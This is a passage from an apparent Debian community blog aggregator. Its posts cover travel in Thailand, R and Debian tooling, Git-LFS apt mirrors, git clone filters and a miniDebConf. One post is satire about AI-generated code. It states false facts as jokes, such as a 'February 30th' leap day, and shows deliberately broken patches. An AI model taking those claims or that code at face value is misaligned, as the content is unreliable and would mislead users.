<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/wat-arun-stamp.jpg" width="300" />
<h4>Wat Arun temple stamps your hand upon entry</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/wat-arun.jpg" width="300" />
<h4>Wat Arun temple</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/khao-san-road.jpg" width="300" />
<h4>Khao San Road</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/a-food-stall-at-khao-san-road.jpg" width="300" />
<h4>A food stall at Khao San Road</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/chao-phraya-boat.jpg" width="300" />
<h4>Chao Phraya Express Boat</h4>
</figure>
<p>For eating, I mainly relied on fruits and convenience stores. Bananas were very tasty. This was the first time I saw banana flesh being yellow. Mangoes were delicious and pineapples were smaller and flavorful. I also ate Rose Apple, which I never had before. I had Chhole Kulche once in Sukhumvit. That was a little expensive as it costed 164 baht. I also used to buy premix coffee packets from 7-Eleven convenience stores and prepare them inside the stores.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/thailand-banana.jpg" width="300" />
<h4>Banana with yellow flesh</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/fruits-at-a-stall-in-thailand.jpg" width="300" />
<h4>Fruits at a stall in Bangkok</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/pineapples-from-thailand.jpg" width="300" />
<h4>Trimmed pineapples from Thailand.</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/corn.jpg" width="300" />
<h4>Corn in Bangkok.</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/coffee-options-at-7-eleven.jpg" width="300" />
<h4>A board showing coffee menu at a 7-Eleven store along with rates in Pattaya.</h4>
</figure>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/premix-coffee-packets-at-7-eleven.jpg" width="300" />
<h4>In this section of 7-Eleven, you can buy a premix coffee and mix it with hot water provided at the store to prepare.</h4>
</figure>
<p>My booking from Bangkok to Delhi was in Air India flight, and they were serving alcohol in the flight. I chose red wine, and this was my first time having alcohol in a flight.</p>
<figure><img src="https://ravidwivedi.in/images/malaysia-thailand/red-wine-in-air-india.jpg" width="300" />
<h4>Red wine being served in Air India</h4>
</figure>
<h2 id="notes">Notes</h2>
<ul>
<li>
<p>In this whole trip spanning two weeks, I did not pay for drinking water (except for once in Pattaya which was 9 baht) and toilets. Bangkok and Kuala Lumpur have plenty of malls where you should find a free-of-cost toilet nearby. For drinking water, I relied mainly on my accommodation providing refillable water for my bottle.</p>
</li>
<li>
<p>Thailand seemed more expensive than Malaysia on average. Malaysia had discounted price due to the Chinese New year.</p>
</li>
<li>
<p>I liked Pattaya more than Bangkok. Maybe because Pattaya has beach and Bangkok doesn’t. Pattaya seemed more lively, and I could meet and talk to a few people as opposed to Bangkok.</p>
</li>
<li>
<p>Chao Phraya River express boat costs 150 baht for one day where you can hop on and off to any boat.</p>
</li>
</ul>Ravi Dwivedihttps://ravidwivedi.in/posts/ciw 0.0.2 on CRAN: Updateshttp://dirk.eddelbuettel.com/blog/2024/03/20#ciw_0.0.22024-03-20T13:18:00+00:00<p>A first revision of the still only one-week old (at <a href="https://cran.r-project.org">CRAN</a>) package <a href="https://dirk.eddelbuettel.com/code/ciw.html">ciw</a> has been
released to <a href="https://cran.r-project.org">CRAN</a>! It provides
is a single (efficient) function <code>incoming()</code> (now along with
an alias <code>ciw()</code>) which summarises the state of the incoming
directories at <a href="https://cran.r-project.org">CRAN</a>. I happen
to like having these things at my (shell) fingertips, so it goes along
with (still draft) <a href="https://github.com/eddelbuettel/littler/blob/master/inst/examples/ciw.r">wrapper
ciw.r</a> that will be part of the next <a href="https://github.com/eddelbuettel/littler">littler</a> release.</p>
<p>For example, when I do this right now as I type this, I see
(typically less than one second later)</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode sh"><code class="sourceCode bash"><span id="cb1-1"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-1" tabindex="-1"></a><span class="ex">edd@rob:~$</span> ciw.r </span>
<span id="cb1-2"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-2" tabindex="-1"></a> <span class="ex">Folder</span> Name Time Size Age</span>
<span id="cb1-3"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-3" tabindex="-1"></a> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>POSc<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>difftime<span class="op">></span></span>
<span id="cb1-4"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-4" tabindex="-1"></a><span class="ex">1:</span> pretest instantiate_0.2.2.tar.gz 2024-03-20 13:29:00 17K 0.07 hours</span>
<span id="cb1-5"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-5" tabindex="-1"></a><span class="ex">2:</span> recheck tinytable_0.2.0.tar.gz 2024-03-20 12:50:00 565K 0.72 hours</span>
<span id="cb1-6"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-6" tabindex="-1"></a><span class="ex">3:</span> pending Matrix_1.7-0.tar.gz 2024-03-20 12:05:00 2.3M 1.47 hours</span>
<span id="cb1-7"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-7" tabindex="-1"></a><span class="ex">4:</span> recheck survey_4.4-2.tar.gz 2024-03-20 02:02:00 2.2M 11.52 hours</span>
<span id="cb1-8"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-8" tabindex="-1"></a><span class="ex">5:</span> waiting equateIRT_2.4.0.tar.gz 2024-03-19 17:00:00 895K 20.55 hours</span>
<span id="cb1-9"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-9" tabindex="-1"></a><span class="ex">6:</span> pending ravetools_0.1.5.tar.gz 2024-03-19 12:06:00 1.0M 25.45 hours</span>
<span id="cb1-10"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-10" tabindex="-1"></a><span class="ex">7:</span> waiting glmmTMB_1.1.9.tar.gz 2024-03-18 16:04:00 4.2M 45.48 hours</span>
<span id="cb1-11"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-11" tabindex="-1"></a><span class="ex">edd@rob:~$</span> </span></code></pre></div>
<p>See <code>ciw.r --help</code> or <code>ciw.r --usage</code> for more.
Alternatively, in your R session, you can call
<code>ciw::incoming()</code> (or now <code>ciw::ciw()</code>) for the
same result (and/or load the package first).</p>
<p>This release adds some packaging touches, brings the new alias
<code>ciw()</code> as well as a state variable with all (known) folder
names and some internal improvements for dealing with error conditions.
The NEWS entry follows.</p>
<blockquote>
<h4 id="changes-in-version-0.0.2-2024-03-20">Changes in version 0.0.2
(2024-03-20)</h4>
<ul>
<li><p>The package README and DESCRIPTION have been expanded</p></li>
<li><p>An alias <code>ciw</code> can now be used for
<code>incoming</code></p></li>
<li><p>Network error handling is now more robist</p></li>
<li><p>A state variable <code>known_folders</code> lists all CRAN
folders below <code>incoming</code></p></li>
</ul>
</blockquote>
<p>Courtesy of my <a href="https://dirk.eddelbuettel.com/cranberries/">CRANberries</a>, there
is also a diffstat report for <a href="https://dirk.eddelbuettel.com/cranberries/2024/03/20#ciw_0.0.2">this
release</a>.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>Dirk Eddelbuettelhttp://dirk.eddelbuettel.com/blogaerc email clienthttps://jmtd.net/log/aerc/2024-03-20T10:38:50+00:00<div class="centre">
<div class="image+centre">
<a href="https://jmtd.net/log/aerc/aerc.png"><img alt="my aerc" class="img" height="260" src="https://jmtd.net/log/aerc/500x-aerc.png" width="500" /></a>
</div>
</div>
<p>I started looking at <a href="https://aerc-mail.org/">aerc</a>, a new Terminal mail client, in
around 2019. At that time it was promising, but ultimately not ready yet for me, so
I put it away and went back to <a href="https://neomutt.org/">neomutt</a> which I have been
using (in one form or another) all century.</p>
<p>These days, I use <code>neomutt</code> as an IMAP client which is perhaps what it's worst
at: prior to that, and in common with most users (I think), I used it to read
local mail, either fetched via <a href="https://www.offlineimap.org/">offlineimap</a> or
directly on my mail server. I switched to using it as a (slow, blocking) IMAP
client because I got sick of maintaining <code>offlineimap</code> (or
<a href="https://github.com/gburd/isync">mbsync</a>), and I started to use <code>neomutt</code> to
read my work mail, which was too large (and rate limited) for local
syncing.</p>
<p>This year I noticed that <code>aerc</code> had a new maintainer who was presenting about
it at <a href="https://fosdem.org">FOSDEM</a>, so I thought I'd take another look. It's
come a long way: far enough to actually displace <code>neomutt</code> for my day-to-day
mail use. In particular, it's a <em>much</em> better IMAP client.</p>
<p>I still reach for <code>neomutt</code> for <em>some</em> tasks, but I'm now using <code>aerc</code> for most
things.</p>
<p><code>aerc</code> is available in Debian, but I recommending building from upstream source
at the moment as the project is quite fast-moving.</p>jmtdhttps://jmtd.net/log/Corydalis 2024.12.0 releasedhttps://k1024.org/posts/2024/2024-03-20-corydalis-v2024.12/2024-03-20T00:20:00+00:00<p>I’ve been working for the past few weeks on Corydalis, and was in no
hurry to make a release, but last evening I found the explanation for
a really, really, really annoying issue: unintended “zooming” on touch
interfaces in the image viewer. Or more precisely, I found this post
from 2015 (9 years ago!):
<a class="uri" href="https://webkit.org/blog/5610/more-responsive-tapping-on-ios/">https://webkit.org/blog/5610/more-responsive-tapping-on-ios/</a> and I
finally understood things. And decided this was the best choice for
cutting a new release.</p>
<p>Of course, the release contains more things, see the changelog on the
release page:
<a class="uri" href="https://github.com/iustin/corydalis/releases/tag/v2024.12.0">https://github.com/iustin/corydalis/releases/tag/v2024.12.0</a>. And of
course, it’s up on <a class="uri" href="http://demo.corydalis.io">http://demo.corydalis.io</a>.</p>
<p>And after putting out the new release, I saw that release tagging is
in the pre-built binaries still broken, and found the reason at
<a class="uri" href="https://github.com/actions/checkout/issues/290">https://github.com/actions/checkout/issues/290</a>. Will fix for the
next release… The stream of bugs never ends 😉</p>Iustin Pophttps://k1024.orgapt install everything?tag:www.chiark.greenend.org.uk,2024-03-19:/~cjwatson/blog/ubuntu-install-everything.html2024-03-19T07:05:27+00:00<p>On Mastodon, the
<a href="https://mastodon.social/@Hacksaw/112118031428498349">question</a> came up of
how Ubuntu would deal with something like the <a href="https://boehs.org/node/npm-everything">npm install
everything</a> situation. I replied:</p>
<blockquote>
<p>Ubuntu is curated, so it probably wouldn’t get this far. If it did, then
the worst case is that it would get in the way of <span class="caps">CI</span> allowing other
packages to be removed (again from a curated system, so people are used to
removal not being self-service); but the release team would have no
hesitation in removing a package like this to fix that, and it certainly
wouldn’t cause this amount of angst.</p>
<p>If you did this in a <a href="https://help.launchpad.net/Packaging/PPA"><span class="caps">PPA</span></a>, then
I can’t think of any particular negative effects.</p>
</blockquote>
<p><span class="caps">OK</span>, if you added lots of build-dependencies (as well as run-time
dependencies) then you might be able to take out a builder. But Launchpad
builders already run arbitrary user-submitted code by design and are
therefore very carefully sandboxed and treated as ephemeral, so this is
hardly novel.</p>
<p>There’s a lot to be said for the arrangement of having a curated system for
the stuff people actually care about plus an ecosystem of add-on
repositories. PPAs cover a wide range of levels of developer activity, from
throwaway experiments to quasi-official distribution methods; there are
certainly problems that arise from it being difficult to tell the difference
between those extremes and from there being no systematic confinement, but
for this particular kind of problem they’re very nearly ideal. (Canonical
has tried various other approaches to software distribution, and while they
address some of the problems, they <a href="https://popey.com/blog/2024/03/exodus-wallet-part-three/">aren’t obviously
better</a> at helping
people make reliable social judgements about code they don’t know.)</p>
<p>For a hypothetical package with a huge number of dependencies, to even try
to upload it directly to Ubuntu you’d need to be an Ubuntu developer with
upload rights (or to go via Debian, where you’d have to clear a similar
hurdle). If you have those, then the first upload has to pass manual review
by an archive administrator. If your package passes that, then it still has
to build and get through
<a href="https://wiki.ubuntu.com/ProposedMigration">proposed-migration</a> <span class="caps">CI</span> before it
reaches anything that humans typically care about.</p>
<p>On the other hand, if you were inclined to try this sort of experiment,
you’d almost certainly try it in a <span class="caps">PPA</span>, and that would trouble nobody but yourself.</p>Colin Watsonhttps://www.chiark.greenend.org.uk/~cjwatson/blog/policy on adding AI generated content to my software projectshttp://joeyh.name/blog/entry/policy_on_adding_AI_generated_content_to_my_software_projects/2024-03-18T20:54:59+00:00<p>I am eager to incorporate your AI generated code into my software.
Really!</p>
<p>I want to facilitate making the process as easy as possible. You're already
using an AI to do most of the hard lifting, so why make the last step hard? To
that end, I skip my usually extensive code review process for your AI generated
code submissions. Anything goes as long as it compiles!</p>
<p>Please do remember to include "(AI generated)" in the description of your
changes (at the top), so I know to skip my usual review process.</p>
<p>Also be sure to sign off to the standard
<a href="https://developercertificate.org/">Developer Certificate of Origin</a>
so I know you attest that you own the code that you generated.
When making a git commit, you can do that by using the
<code>--signoff</code> <a href="https://git-scm.com/docs/git-commit#Documentation/git-commit.txt---signoff">option</a>.</p>
<p>I do make some small modifications to AI generated submissions.
For example, maybe you used AI to write this code:</p>
<pre><code>+ // Fast inverse square root
+ float fast_rsqrt( float number )
+ {
+ float x2 = number * 0.5F;
+ float y = number;
+ long i = * ( long * ) &y;
+ i = 0x5f3659df - ( i >> 1 );
+ y = * ( float * ) &i;
+ return (y * ( 1.5F - ( x2 * y * y ) ));
+ }
...
- foo = rsqrt(bar)
+ foo = fast_rsqrt(bar)
</code></pre>
<p>Before AI, only a genious like John Carmack could write anything close to
this, and now you've generated it with some simple prompts to an AI.
So of course I will accept your patch. But as part of my QA process,
I might modify it so the new code is not run all the time. Let's only run
it on leap days to start with. As we know, leap day is February 30th, so I'll
modify your patch like this:</p>
<pre><code>- foo = rsqrt(bar)
+ time_t s = time(NULL);
+ if (localtime(&s)->tm_mday == 30 && localtime(&s)->tm_mon == 2)
+ foo = fast_rsqrt(bar);
+ else
+ foo = rsqrt(bar);
</code></pre>
<p>Despite my minor modifications, you did the work (with AI!) and so
you deserve the credit, so I'll keep you listed as the author.</p>
<p>Congrats, you made the world better!</p>
<p>PS: Of course, the other reason I don't review AI generated code is that I
simply don't have time and have to prioritize reviewing code written by
falliable humans. Unfortunately, this does mean that if you submit AI
generated code that is not clearly marked as such, and use my limited
reviewing time, I won't have time to review other submissions from you
in the future. I will still accept all your botshit submissions though!</p>
<p>PPS: Ignore the haters who claim that botshit makes AIs that get trained
on it less effective. Studies <a href="https://arxiv.org/abs/2305.17493">like this one</a>
just aren't believable. I asked Bing to summarize it and it said not to worry
about it!</p>Joey Hesshttp://joeyh.name/blog/Apt archive mirrors in Git-LFShttps://blog.josefsson.org/?p=19472024-03-18T16:15:49+00:00<p>My effort to improve transparency and confidence of public apt archives continues. I started to work on this in “<a href="https://blog.josefsson.org/2023/02/01/apt-archive-transparency-debdistdiff-apt-canary/">Apt Archive Transparency</a>” in which I mention the <a href="https://gitlab.com/debdistutils/debdistget/">debdistget</a> project in passing. <strong>Debdistget</strong> is responsible for mirroring index files for some public apt archives. I’ve realized that having a publicly auditable and preserved mirror of the apt repositories is central to being able to do apt transparency work, so the debdistget project has become more central to my project than I thought. Currently I track <a href="https://trisquel.info/">Trisquel</a>, <a href="https://pureos.net/">PureOS</a>, <a href="https://www.gnuinos.org/">Gnuinos</a> and their upstreams <a href="https://ubuntu.com/">Ubuntu</a>, <a href="https://www.debian.org/">Debian</a> and <a href="https://www.devuan.org/">Devuan</a>.</p>
<p>Debdistget download <strong>Release/Package/Sources</strong> files and store them in a git repository published on <a href="https://about.gitlab.com/">GitLab</a>. Due to size constraints, it uses two repositories: one for the <strong>Release/InRelease</strong> files (which are small) and one that also include the <strong>Package/Sources</strong> files (which are large). See for example the repository for <a href="https://gitlab.com/debdistutils/archives/trisquel/releases">Trisquel release files</a> and the <a href="https://gitlab.com/debdistutils/archives/trisquel/packages">Trisquel package/sources files</a>. Repositories for all distributions can be found in <a href="https://gitlab.com/debdistutils/archives">debdistutils’ archives GitLab sub-group</a>.</p>
<p>The reason for splitting into two repositories was that the git repository for the combined files become large, and that some of my use-cases only needed the release files. Currently the repositories with packages (which contain a couple of months worth of data now) are 9GB for <a href="https://gitlab.com/debdistutils/archives/ubuntu/packages">Ubuntu</a>, 2.5GB for <a href="https://gitlab.com/debdistutils/archives/trisquel/packages">Trisquel</a>/<a href="https://gitlab.com/debdistutils/archives/debian/packages">Debian</a>/<a href="https://gitlab.com/debdistutils/archives/pureos/packages">PureOS</a>, 970MB for <a href="https://gitlab.com/debdistutils/archives/devuan/packages">Devuan</a> and 450MB for <a href="https://gitlab.com/debdistutils/archives/gnuinos/packages">Gnuinos</a>. The repository size is correlated to the size of the archive (for the initial import) plus the frequency and size of updates. Ubuntu’s use of <a href="https://wiki.ubuntu.com/PhasedUpdates">Apt Phased Updates</a> (which triggers a higher churn of Packages file modifications) appears to be the primary reason for its larger size.</p>
<p>Working with large Git repositories is inefficient and the GitLab CI/CD jobs generate quite some network traffic downloading the git repository over and over again. The most heavy user is the <a href="https://gitlab.com/debdistutils/debdistdiff">debdistdiff</a> project that download all distribution package repositories to do diff operations on the package lists between distributions. The daily job takes around <strong>80 minutes</strong> to run, with the majority of time is spent on downloading the archives. Yes I know I could look into runner-side caching but I dislike complexity caused by caching.</p>
<p>Fortunately not all use-cases requires the package files. The <a href="https://gitlab.com/debdistutils/debdistcanary">debdistcanary</a> project only needs the <strong>Release/InRelease</strong> files, in order to commit signatures to the <a href="https://docs.sigstore.dev/">Sigstore</a> and <a href="https://www.sigsum.org/">Sigsum</a> transparency logs. These jobs still run fairly quickly, but watching the repository size growth worries me. Currently these repositories are at <a href="https://gitlab.com/debdistutils/canary/debian">Debian</a> 440MB, <a href="https://gitlab.com/debdistutils/canary/pureos">PureOS</a> 130MB, <a href="https://gitlab.com/debdistutils/canary/ubuntu">Ubuntu</a>/<a href="https://gitlab.com/debdistutils/canary/devuan">Devuan</a> 90MB, <a href="https://gitlab.com/debdistutils/canary/trisquel">Trisquel</a> 12MB, <a href="https://gitlab.com/debdistutils/canary/gnuinos">Gnuinos</a> 2MB. Here I believe the main size correlation is update frequency, and Debian is large because I track the volatile unstable.</p>
<p>So I hit a scalability end with my first approach. A couple of months ago I “solved” this by discarding and resetting these archival repositories. The GitLab CI/CD jobs were fast again and all was well. However this meant discarding precious historic information. A couple of days ago I was reaching the limits of practicality again, and started to explore ways to fix this. I like having data stored in git (it allows easy integration with software integrity tools such as <a href="https://gnupg.org/">GnuPG</a> and Sigstore, and the git log provides a kind of temporal ordering of data), so it felt like giving up on nice properties to use a traditional database with on-disk approach. So I started to learn about <a href="https://git-lfs.com/">Git-LFS</a> and understanding that it was able to <a href="https://devblogs.microsoft.com/bharry/the-largest-git-repo-on-the-planet/">handle multi-GB worth of data</a> that looked promising.</p>
<p>Fairly quickly I scripted up a <a href="https://gitlab.com/debdistutils/debdistget/-/blob/main/ci-debdistget-dists.yml">GitLab CI/CD job</a> that incrementally update the <strong>Release/Package/Sources</strong> files in a git repository that uses Git-LFS to store all the files. The repository size is now at <a href="https://gitlab.com/debdistutils/dists/ubuntu">Ubuntu 650kb</a>, <a href="https://gitlab.com/debdistutils/dists/debian">Debian 300kb</a>, <a href="https://gitlab.com/debdistutils/dists/trisquel">Trisquel 50kb</a>, <a href="https://gitlab.com/debdistutils/dists/devuan">Devuan 250kb</a>, <a href="https://gitlab.com/debdistutils/dists/pureos">PureOS 172kb</a> and <a href="https://gitlab.com/debdistutils/dists/gnuinos">Gnuinos 17kb</a>. As can be expected, jobs are quick to clone the git archives: <a href="https://gitlab.com/debdistutils/debdistdiff/-/pipelines">debdistdiff pipelines</a> went from a <strong>run-time of 80 minutes down to 10 minutes</strong> which more reasonable correlate with the archive size and CPU run-time.</p>
<p>The LFS storage size for those repositories are at <a href="https://gitlab.com/debdistutils/dists/ubuntu">Ubuntu 15GB</a>, <a href="https://gitlab.com/debdistutils/dists/debian">Debian 8GB</a>, <a href="https://gitlab.com/debdistutils/dists/trisquel">Trisquel 1.7GB</a>, <a href="https://gitlab.com/debdistutils/dists/devuan">Devuan 1.1GB</a>, <a href="https://gitlab.com/debdistutils/dists/pureos">PureOS</a>/<a href="https://gitlab.com/debdistutils/dists/gnuinos">Gnuinos</a> 420MB. This is for a couple of days worth of data. It seems native Git is better at compressing/deduplicating data than Git-LFS is: the combined size for Ubuntu is already 15GB for a couple of days data compared to 8GB for a couple of months worth of data with pure Git. This may be a sub-optimal implementation of Git-LFS in GitLab but it does worry me that this new approach will be difficult to scale too. At some level the difference is understandable, Git-LFS probably store two different <strong>Packages</strong> files — around 90MB each for Trisquel — as two 90MB files, but native Git would store it as one compressed version of the 90MB file and one relatively small patch to turn the old files into the next file. So the Git-LFS approach surprisingly scale less well for overall storage-size. Still, the original repository is much smaller, and you usually don’t have to pull all LFS files anyway. So it is net win.</p>
<p>Throughout this work, I kept thinking about how my approach relates to <a href="https://snapshot.debian.org/">Debian’s snapshot service</a>. Ultimately what I would want is a combination of these two services. To have a good foundation to do transparency work I would want to have a collection of all <strong>Release/Packages/Sources</strong> files ever published, and ultimately also the source code and binaries. While it makes sense to start on the latest stable releases of distributions, this effort should scale backwards in time as well. For reproducing binaries from source code, I need to be able to securely find earlier versions of binary packages used for rebuilds. So I need to import all the <strong>Release/Packages/Sources</strong> packages from snapshot into my repositories. The latency to retrieve files from that server is slow so I haven’t been able to find an efficient/parallelized way to download the files. If I’m able to finish this, I would have confidence that my new Git-LFS based approach to store these files will scale over many years to come. This remains to be seen. Perhaps the repository has to be split up per release or per architecture or similar.</p>
<p>Another factor is storage costs. While the git repository size for a Git-LFS based repository with files from several years may be possible to sustain, the Git-LFS storage size surely won’t be. It seems GitLab charges the same for files in repositories and in Git-LFS, and it is around <strong>$500 per 100GB</strong> per year. It may be possible to setup a separate Git-LFS backend not hosted at GitLab to serve the LFS files. Does anyone know of a suitable server implementation for this? I had a quick look at the <a href="https://github.com/git-lfs/git-lfs/wiki/Implementations">Git-LFS implementation list</a> and it seems the closest reasonable approach would be to setup the Gitea-clone <a href="https://forgejo.org/">Forgejo</a> as a self-hosted server. Perhaps a cloud storage approach a’la S3 is the way to go? The cost to host this on GitLab will be manageable for up to <strong>~1TB ($5000/year)</strong> but scaling it to storing say <strong>500TB</strong> of data would mean an yearly fee of <strong>$2.5M</strong> which seems like poor value for the money.</p>
<p>I realized that ultimately I would want a git repository locally with the entire content of all apt archives, including their binary and source packages, ever published. The storage requirements for a service like snapshot (~300TB of data?) is today not prohibitly expensive: 20TB disks are $500 a piece, so a storage enclosure with 36 disks would be around <strong>$18.000 for 720TB</strong> and using RAID1 means 360TB which is a good start. While I have heard about ~TB-sized Git-LFS repositories, would Git-LFS scale to 1PB? Perhaps the size of a git repository with multi-millions number of Git-LFS pointer files will become unmanageable? To get started on this approach, I decided to import a mirror of <strong>Debian’s bookworm for amd64</strong> into a Git-LFS repository. That is around <strong>175GB</strong> so reasonable cheap to host even on GitLab ($1000/year for 200GB). Having this repository publicly available will make it possible to write software that uses this approach (e.g., porting <a href="https://gitlab.com/debdistutils/debdistreproduce">debdistreproduce</a>), to find out if this is useful and if it could scale. Distributing the apt repository via Git-LFS would also enable other interesting ideas to protecting the data. Consider configuring apt to use a local <strong>file://</strong> URL to this git repository, and verifying the git checkout using some method similar to <a href="https://archive.fosdem.org/2023/schedule/event/security_where_does_that_code_come_from/">Guix’s approach to trusting git</a> content or <a href="https://github.com/sigstore/gitsign">Sigstore’s gitsign</a>.</p>
<p>A naive push of the <strong>175GB</strong> archive in a single git commit ran into pack size limitations:</p>
<p><code>remote: fatal: pack exceeds maximum allowed size (4.88 GiB)</code></p>
<p>however breaking up the commit into smaller commits for parts of the archive made it possible to push the entire archive. Here are the commands to create this repository:</p>
<p><code>git init<br />git lfs install<br />git lfs track 'dists/**' 'pool/**'<br />git add .gitattributes<br />git commit -m"Add Git-LFS track attributes." .gitattributes<br />time debmirror --method=rsync --host ftp.se.debian.org --root :debian --arch=amd64 --source --dist=bookworm,bookworm-updates --section=main --verbose --diff=none --keyring /usr/share/keyrings/debian-archive-keyring.gpg --ignore .git .<br />git add dists project<br />git commit -m"Add." -a<br />git remote add origin git@gitlab.com:debdistutils/archives/debian/mirror.git<br />git push --set-upstream origin --all<br />for d in pool/<em>/</em>; do<br /> echo $d;<br /> time git add $d;<br /> git commit -m"Add $d." -a<br /> git push<br />done</code></p>
<p>The <a href="https://gitlab.com/debdistutils/archives/debian/mirror">resulting repository</a> size is around 27MB with Git LFS object storage around 174GB. I think this approach would scale to handle all architectures for one release, but working with a single git repository for all releases for all architectures may lead to a too large git repository (>1GB). So maybe one repository per release? These repositories could also be split up on a subset of <strong>pool/</strong> files, or there could be one repository per release per architecture or sources.</p>
<p>Finally, I have concerns about using SHA1 for identifying objects. It seems both Git and Debian’s snapshot service is currently using SHA1. For Git there is <a href="https://git-scm.com/docs/hash-function-transition">SHA-256 transition</a> and it seems GitLab is working on support for SHA256-based repositories. For serious long-term deployment of these concepts, it would be nice to go for SHA256 identifiers directly. Git-LFS already uses SHA256 but Git internally uses SHA1 as does the Debian snapshot service.</p>
<p>What do you think? Happy Hacking!</p>simonhttps://blog.josefsson.orgvcswatch and git --filterhttps://www.df7cb.de/blog/2024/vcswatch-git-filter.html2024-03-18T12:45:40+00:00<p>Debian is running a "<a href="https://qa.debian.org/cgi-bin/vcswatch">vcswatch</a>"
service that keeps track of the status of all packaging repositories that have a
<a href="https://www.debian.org/doc/manuals/developers-reference/best-pkging-practices.de.html#vcs"><tt>Vcs-Git</tt></a>
(and other VCSes) header set and shows which repos might need a package upload to push pending changes out.</p>
<p>Naturally, this is a lot of data and the scratch partition on qa.debian.org
had to be expanded several times, up to 300 GB in the last iteration.
Attempts to reduce that size using shallow clones (<tt>git clone --depth=50</tt>)
did not result more than a few percent of space saved. Running <tt>git gc</tt> on
all repos helps a bit, but is tedious and as Debian is growing, the repos are
still growing both in size and number. I ended up blocking all repos with
checkouts larger than a gigabyte, and still the only cure was expanding the
disk, or to lower the blocking threshold.</p>
<p>Since we only need a tiny bit of info from the repositories, namely the content
of <tt>debian/changelog</tt> and a few other files from <tt>debian/</tt>, plus
the number of commits since the last tag on the packaging branch, it made sense
to try to get the info without fetching a full repo clone. The question if we
could grab that solely using the GitLab API at salsa.debian.org was never
really answered. But then, in <a href="https://bugs.debian.org/1032623">#1032623</a>,
Gábor Németh suggested the use of
<a href="https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---filterltfilter-specgt"><tt>git clone --filter blob:none</tt></a>.
As things go, this sat unattended in the bug report for almost a year until the
next "disk full" event made me give it a try.</p>
<p>The <tt>blob:none</tt> filter makes git clone omit all files, fetching only commit and
tree information. Any blob (file content) needed at git run time is
transparently fetched from the upstream repository, and stored locally. It
turned out to be a game-changer. The (largish) repositories I tried it on
shrank to 1/100 of the original size.</p>
<p>Poking around I figured we could even do better by using <tt>tree:0</tt> as
filter. This additionally omits all trees from the git clone, again only
fetching the information at run time when needed. Some of the larger repos I
tried it on shrank to <em>1/1000</em> of their original size.</p>
<p>I deployed the new option on qa.debian.org and scheduled all repositories to
fetch a new clone on the next scan:</p>
<p><img src="https://www.df7cb.de/blog/2024/df-month.png" /></p>
<p>The initial dip from 100% to 95% is my first "what happens if we block repos
> 500 MB" attempt. Over the week after that, the git filter clones reduce the
overall disk consumption from almost 300 GB to 15 GB, a <em>1/20</em>. Some
repos shrank from GBs to below a MB.</p>
<p>Perhaps I should make all my git clones use one of the filters.</p>Christoph Berghttps://www.df7cb.de/blog/tag/debian.htmlAfter miniDebConf Santa Fehttps://gwolf.org/2024/03/after-minidebconf-santa-fe.html2024-03-18T04:00:25+00:00<p>Last week we held our promised miniDebConf in Santa Fe City, Santa Fe province,
Argentina — just across the river from Paraná, where I have spent almost six
beautiful months I will never forget.</p>
<p><a href="https://gwolf.org/files/2024-03/mate.jpg">
<img align="left" height="203" src="https://gwolf.org/files/2024-03/mate.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>Around 500 Kilometers North from Buenos Aires, Santa Fe and Paraná are separated
by the beautiful and majestic <em>Paraná</em> river, which flows from Brazil, marks the
Eastern border of Paraguay, and continues within Argentina as the heart of the
<em>litoral</em> region of the country, until it merges with the <em>Uruguay</em> river (you
guessed right — the river marking the Eastern border of Argentina, first with
Brazil and then with Uruguay), and they become the <em>Río de la Plata</em>.</p>
<p><a href="https://gwolf.org/files/2024-03/during_talks.jpg">
<img align="right" height="106" src="https://gwolf.org/files/2024-03/during_talks.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>This was a short miniDebConf: we were lent the <em>APUL</em> union’s building for the
weekend (thank you very much!); during Saturday, we had a cycle of talks, and on
sunday we had more of a hacklab logic, having some unstructured time to work
each on their own projects, and to talk and have a good time together.</p>
<p><a href="https://gwolf.org/files/2024-03/dds.jpg">
<img align="left" height="138" src="https://gwolf.org/files/2024-03/dds.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>We were five Debian people attending:
<code class="highlighter-rouge">{santiago|debacle|eamanu|dererk|gwolf}@debian.org</code>. My main contact to
kickstart organization was Martín Bayo. Martín was for many years the leader of
the <a href="https://www.unl.edu.ar/carreras/tecnicatura-universitaria-en-software-libre/">Technical Degree on Free Software at Universidad Nacional del
Litoral</a>,
where I was also a teacher for several years. Together with Leo Martínez, also a
teacher at the <em>tecnicatura</em>, they contacted us with Guillermo and Gabriela,
